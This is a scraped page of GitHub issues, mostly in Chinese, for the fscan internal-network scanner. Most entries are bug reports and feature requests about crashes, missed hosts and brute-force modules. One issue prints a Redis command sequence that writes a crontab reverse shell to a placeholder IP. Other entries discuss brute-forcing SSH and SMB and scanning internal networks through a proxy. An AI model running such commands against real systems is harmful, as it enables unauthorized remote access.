shadow1ng / fscan Goto Github PK
View Code? Open in Web Editor NEW一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
License: MIT License
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
License: MIT License
大佬,请问为何编译不成功,
报错:
C:\Users\Getin\Desktop\fscan-main>go build -ldflags="-s -w " -trimpath main.go
Plugins\ftp.go:4:2: imported and not used: "errors"
Plugins\ftp.go:8:2: imported and not used: "net"
Plugins\ms17017.go:130:4: undefined: MS17010EXP
直接在中断的时候 给他发送rst包 (就是那个fin,ack 改成rst,ack)
那样连接就被打掉了 不会有什么短连接了 连接应该直接不见了
这个方式在syn扫描和中断短连接都可以用 不清楚实现难度大不大
我在将web端口增加为如下时
Info.Ports = "80,81,88,443,888,7001,7002,7004,7008,7080,8000,8001,8002,8008,8010,8048,8080,8081,8082,8084,8088,8089,8090,8098,8161,8848,8880,8888,9001,9080,9090,9098,9200"
对应的DefaultPorts也同步增加了
发现师傅会将所有端口都会先走一遍open,然后到web的时候再去走title,poc,这样导致了效率很低下,
建议web端口不去走TCPportScan,在ip存活的情况下跳过TCPportScan,且web模块的线程调高
目前在公司对一个B段进行内部安全排查,发现更新后的版本似乎SSH与SMB爆破结果都是空的。默认线程600,为了准确性我们将线程为100,依然获取不想预期的结果。账号,口令 (其中账号口令是已经确认的) 是通过参数指定,命令如下:
./fscan_amd64_upx -h 10.x.0.1/16 -user xxx -pwd xxx -t 100
redis> CONFIG GET dir
dir
/var/lib/redis
redis> CONFIG GET dbfilename
dbfilename
dump.rdb
redis> set x "\n* * * * * bash -i >& /dev/tcp/x.x.x.x/9999 0>&1\n"
OK
redis> config set dir /var/spool/cron/
OK
redis> config set dbfilename root
OK
redis> save //保存配置,写入crontab反弹shell
OK
redis> config set dir /var/lib/redis //恢复redis配置文件
OK
redis> config set dbfilename dump.rdb //恢复redis配置文件
OK
可以看懂?扫描器直接改了dir和dbfinlename而不给改回去,这个点建议改良一下~
文件目录在common下ParseIP.go文件中
134行如下:
for num := startNum; num < endNum; num++ {
ip := strconv.Itoa((num>>24)&0xff) + "." + strconv.Itoa((num>>16)&0xff) + "." + strconv.Itoa((num>>8)&0xff) + "." + strconv.Itoa((num)&0xff)
AllIP = append(AllIP, ip)
}
114 行如下:
for i := ip1; i <= ip2; i++ {
AllIP = append(AllIP, PrefixIP+"."+strconv.Itoa(i))
}
第一个是前闭后开,第二个是前闭后闭,导致IP扫描的结果相差1个
增加功能指定一个ip列表然后扫描一小批常见web端口,只去跑http、https然后去除400状态码且访问以后跟随跳转提取title、状态码、返回包大小生成csv格式文件
先使用 ./fscan -h 10.9.54.1/24
10.9.54.4:22 open
10.9.54.4:8089 open
10.9.54.8:22 open
10.9.54.12:22 open
10.9.54.8:3306 open
10.9.54.6:22 open
10.9.54.5:22 open
10.9.54.8:6379 open
10.9.54.13:22 open
10.9.54.10:22 open
10.9.54.2:80 open
10.9.54.2:8080 open
10.9.54.10:3306 open
10.9.54.10:80 open
10.9.54.8:27017 open
10.9.54.254:22 open
10.9.54.2:11211 open
10.9.54.8:9200 open
10.9.54.8:11211 open
10.9.54.5:8080 open
10.9.54.6:8089 open
10.9.54.9:22 open
10.9.54.7:22 open
10.9.54.9:8080 open
10.9.54.2:8089 open
然后使用./fscan -h 10.9.54.1/16
10.9.3.13:21 open
10.9.2.11:22 open
10.9.3.13:22 open
10.9.3.13:80 open
10.9.2.11:80 open
10.9.3.13:443 open
10.9.2.5:22 open
10.9.3.13:3306 open
10.9.2.5:80 open
10.9.2.16:22 open
10.9.3.13:5432 open
10.9.2.11:443 open
10.9.2.5:443 open
10.9.3.5:22 open
10.9.2.12:22 open
10.9.2.2:22 open
10.9.2.2:80 open
10.9.3.4:22 open
10.9.2.4:22 open
10.9.2.2:443 open
10.9.2.3:80 open
10.9.2.3:443 open
10.9.2.12:443 open
10.9.3.13:8000 open
10.9.3.3:22 open
10.9.2.12:80 open
10.9.2.3:22 open
10.9.2.4:80 open
10.9.2.4:443 open
10.9.3.3:8080 open
10.9.3.10:80 open
10.9.3.10:443 open
10.9.3.10:21 open
10.9.3.10:22 open
10.9.3.10:3306 open
10.9.3.10:5432 open
10.9.3.10:8000 open
10.9.11.3:443 open
10.9.11.3:80 open
10.9.11.2:443 open
10.9.11.2:80 open
10.9.11.1:443 open
10.9.3.2:22 open
10.9.3.1:22 open
10.9.11.5:22 open
10.9.3.254:22 open
10.9.8.2:22 open
10.9.2.13:22 open
10.9.2.13:80 open
10.9.2.13:443 open
10.9.2.250:22 open
10.9.11.1:80 open
10.9.3.1:8080 open
有很多段并没有扫就结束了
使用-hf也是一样,后面发现只要扫描ip数量过大就会出现这种情况
./fscan_amd64_upx -h 10.1.1.1/16
这样的参数运行只会运行ping扫描,没执行扫描插件
ssh 35.198.203.xxx:22 root 0048 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none], no supported methods remain
他这种none的 是不是不支持密码验证的? 如果是的话这bug严重哇
不支持验证为什么他还一直跑流量呢!??
//我于是手动打开ssh 结果发现他是公钥验证的 所以目前这个问题很大
又看了下 发现同一个ip 出现了2个日志
已完成 1680/1781 [-] ssh 34.97.91.a:22 root 1914 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none], no supported methods remain
已完成 1709/1810 [-] ssh 34.97.91.a:22 root 2046 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none], no supported methods remain
增加基于tcp的协议探测。
比如这个跑100个连接 网关rtt有大波动 乃至丢包
ncrack跑200个 rtt基本不咋动
这连接数要是都100 还是一个卡一个不卡
真是奇怪了. 是这个对time_wait 重用支持不好么?
WebScan\WebScan.go:4:2: package embed is not in GOROOT (E:\go\src\embed)
出现了这个问题,go版本1.15
package github.com/shadow1ng/fscan
imports github.com/shadow1ng/fscan/Plugins
imports github.com/shadow1ng/fscan/WebScan
imports embed: no Go files in /usr/local/go/src/embed
扫B段的时候出现主机存活与端口漏掉的情况,并且每次扫描结果均不同,默认icmp模式
C段没有这种情况
希望可以添加一个静默模式的输出,类似于 ksubdomain 的 -silent 参数
使用后屏幕将仅输出成功爆破或检测出的结果
ssh字典缺少 root/root
环境MAC(windows下正常)
正常情况下:
go run main.go -h 172.20.10.1/24
(Ping) Target '172.20.10.15' is alive
(Ping) Target '172.20.10.1' is alive
(Ping) Target '172.20.10.3' is alive
icmp alive hosts len is: 3
172.20.10.1:21 open
在-np
下扫描导致错误,并且无法自动结束。
go run main.go -h 172.20.10.1/24 -np
172.20.10.63:21 open
172.20.10.29:21 open
172.20.10.62:21 open
open result.txt: too many open files
open result.txt: too many open files
172.20.10.64:21 open
open result.txt: too many open files
172.20.10.54:21 open
open result.txt: too many open files
...
扫描完weblogic的漏洞之后就会卡住,过一会进程自动结束,也没有scan end的返回
希望添加一个不执行其中某个POC的功能,在暴力破解FTP时程序运行很慢想跳过
2020/12/19 22:34:53 Unsolicited response received on idle HTTP channel starting with "HTTP/1.1 200 OK\r\nCache-Control: no-cache, no-store, max-age=0, must-revalidate\r\nPragma: no-cache\r\nContent-Type: text/html\r\nX-Download-Options: noopen\r\nX-Frame-Options: SAMEORIGIN\r\nX-XSS-Protection: 1; mode=block\r\nContent-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'\r\nX-Content-Type-Options: nosniff\r\nDate: Sat, 19 Dec 2020 14:34:47 GMT\r\nConnection: Keep-Alive\r\nContent-Language: en\r\nContent-Length: 5551\r\n\r\n"; err=
报错后终止。
还有想问一下linux最后跑弱口令,都结束了会卡很久是啥原因?
师傅,多次使用时发现:在跑B段、C段,机器多的时候 mysql、ftp、mssql这些爆破模块会卡住不动,不按ctrl+c的话也不知道要等多久才能结束,有什么办法解决这个问题吗?
panic: reflect: call of reflect.Value.Type on zero Value
goroutine 209696 [running]:
reflect.Value.Type(0x0, 0x0, 0x0, 0x4, 0x221a2a0)
c:/go/src/reflect/value.go:1908 +0x13e
github.com/shadow1ng/fscan/Plugins.ScanFunc(0x1434c000, 0x148c09cd, 0x4, 0x15664
fbc, 0x1, 0x1, 0x0, 0x138173d, 0x1d651ec, 0x14026100, ...)
C:/source/fscan-main/Plugins/scanner.go:75 +0xbb
github.com/shadow1ng/fscan/Plugins.AddScan.func1(0x148c09cd, 0x4, 0x14baeb40, 0x
140e45f0, 0x14a6e3c0)
C:/source/fscan-main/Plugins/scanner.go:58 +0x71
created by github.com/shadow1ng/fscan/Plugins.AddScan
C:/source/fscan-main/Plugins/scanner.go:57 +0x9d
情景:web服务器上通过nps设置socks5代理出来,攻击者本地连接socks5,并使用fscan扫描内网,发现没有任何成功。
A:
你之前说最新的fscan有什么问题了?
XXXXXX:
还是有乱码
A:
还有其他吗
XXXXXX:
指result.txt里面的乱码
A:
他只处理了这三种编码 ISO也很常见 没加进去
XXXXXX:
原来如此,给他提个issue
A:
自己改还快些
A:
除了443 其他都用http协议访问 难怪会漏报
XXXXXX:
继续提issue
XXXXXX:
让他两种都试试
A:
我先看完吧 他后面有个函数好像能识别https的 另外还有处理
A:
还真的是只识别443端口,另外就是302跳转他也只跳一次,昨天我爆破好几个站点都是跳三次的,虽然第一次登陆可能一般只会有一次跳转
XXXXXX:
给他提issuse
A:
你去啊
A:
我不做伸手党
他就扫描下然后就停了 这个正常么?
172.16.0.0/12 属于内网网段,所以如果扫172网段的命令就应该是:
fscan -h 172.16.xx.xx/12
然而不支持。
百度了一圈都不知道什么问题
我在fscan里添加了xray的poc,格式都是一样的,为啥检测不出来。。
是否考虑B段扫描,很多时候需要B段测活
能否增加-f从文件读取ip列表的功能
//
func checkVul(tasks []Task, ticker *time.Ticker) <-chan Task {
var wg sync.WaitGroup
results := make(chan Task)
for _, task := range tasks { //这样开线程,一百个任务直接同时执行....
wg.Add(1)
go func(task Task) { //此处task已有局部变量,不需要再写成函数参数
defer wg.Done()
<-ticker.C //此处用ticker,每次ticker通知的时候,会直接并发执行多个线程,如频率为5,0.00s执行5个,实际应该是每隔200毫秒执行一个比较好
isVul, err := executePoc(task.Req, task.Poc)
if err != nil {
return
}
if isVul {
results <- task
}
}(task)
}
go func() {
wg.Wait() //此处执行到wait时,可能下面的代码已经执行了return,此时返回的结果里会不会漏掉一些扫描结果?实际直接执行这两句就好了,加个defer,不需要go起一个线程吧?
close(results)
}()
return results
}
个人觉得写成下面更科学点
//start process
fmt.Println("Start Process: ",proWorkers)
for i := 0;i< proWorkers;i++{
pWait.Add(1)
go func() {
for data := range processQueue{
func (){
defer common.CatchPanic()
result := handler(data)
if !IsNil(result){
outQueue <- result
}
}()
}
pWait.Done()
}()
}
格式有点垃圾,望大佬加油~
为什么没有oracle数据库的检测?
win10 x64 ,刚刚编译的最新版
PS D:\Tools> .\fscan.exe -h 192.168.101.177
/ _ \ ___ ___ _ __ __ _ | | __
/ /// |/ | '/ ` |/ __| |/ /
/ /\____ \ (__| | | (| | (| <
_/ |/_|| _,|___||_
fscan version: 1.6.0
start infoscan
(icmp) Target '192.168.101.177' is alive
icmp alive hosts len is: 1
192.168.101.177:8080 open
192.168.101.177:139 open
192.168.101.177:80 open
192.168.101.177:21 open
192.168.101.177:443 open
192.168.101.177:9100 open
alive ports len is: 6
start vulscan
[*] WebTitle:http://192.168.101.177:8080 404 404 Not Found
panic: runtime error: slice bounds out of range [47:45]
goroutine 1107 [running]:
github.com/shadow1ng/fscan/Plugins.NetBIOS1(0xc0003e2180, 0xc0003aa620, 0xf, 0xc0003aa6c0, 0x9, 0xc000160930, 0x65, 0x0, 0x0, 0x0, ...)
github.com/shadow1ng/fscan/Plugins/NetBIOS.go:128 +0x157f
github.com/shadow1ng/fscan/Plugins.NetBIOS(0xc0003e2180, 0x0, 0x0)
github.com/shadow1ng/fscan/Plugins/NetBIOS.go:51 +0x75
reflect.Value.call(0xf18020, 0x1267a78, 0x13, 0x10279f9, 0x4, 0xc00054e000, 0x1, 0x1, 0xc000aa9e90, 0x80e358, ...)
reflect/value.go:476 +0x907
reflect.Value.Call(0xf18020, 0x1267a78, 0x13, 0xc00054e000, 0x1, 0x1, 0xc000412b98, 0xc000a98600, 0xc000a98688)
reflect/value.go:337 +0xc5
github.com/shadow1ng/fscan/Plugins.ScanFunc(0xc0003b0600, 0xc000b8e208, 0x3, 0xc000aa9f98, 0x1, 0x1, 0x0, 0x0, 0x803b5d, 0x12686a0, ...)
github.com/shadow1ng/fscan/Plugins/scanner.go:102 +0x245
github.com/shadow1ng/fscan/Plugins.AddScan.func1(0xc000b8e208, 0x3, 0xc0003e2180, 0xc0003aabe4, 0xc00007c8a0)
github.com/shadow1ng/fscan/Plugins/scanner.go:81 +0xcd
created by github.com/shadow1ng/fscan/Plugins.AddScan
github.com/shadow1ng/fscan/Plugins/scanner.go:77 +0xdd
参数:
-h 10.1.1.1/8 -p 7001,7002,8880 -m webtitle 或
-h 10.1.1.1/8 -p 7001,7002,8880
ping扫描后自动停止,无报错
改为 -h 10.1.1.1/16 -p 7001,7002,8880 -m webtitle 正常运行
另外,我想要师傅的cmd背景壁纸!😂
start vulscan
panic: reflect: call of reflect.Value.Type on zero Value
goroutine 7663 [running]:
reflect.Value.Type(0x0, 0x0, 0x0, 0x4, 0x19bf400)
reflect/value.go:1908 +0x190
github.com/shadow1ng/fscan/Plugins.ScanFunc(0xc000326690, 0xc000386970, 0x4, 0xc0003f5f98, 0x1, 0x1, 0x0, 0x0, 0x883b5d, 0x12eca80, ...)
github.com/shadow1ng/fscan/Plugins/scanner.go:97 +0x105
github.com/shadow1ng/fscan/Plugins.AddScan.func1(0xc000386970, 0x4, 0xc000510270, 0xc000321e00, 0xc00003a900)
github.com/shadow1ng/fscan/Plugins/scanner.go:85 +0xcd
created by github.com/shadow1ng/fscan/Plugins.AddScan
github.com/shadow1ng/fscan/Plugins/scanner.go:81 +0xdd
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.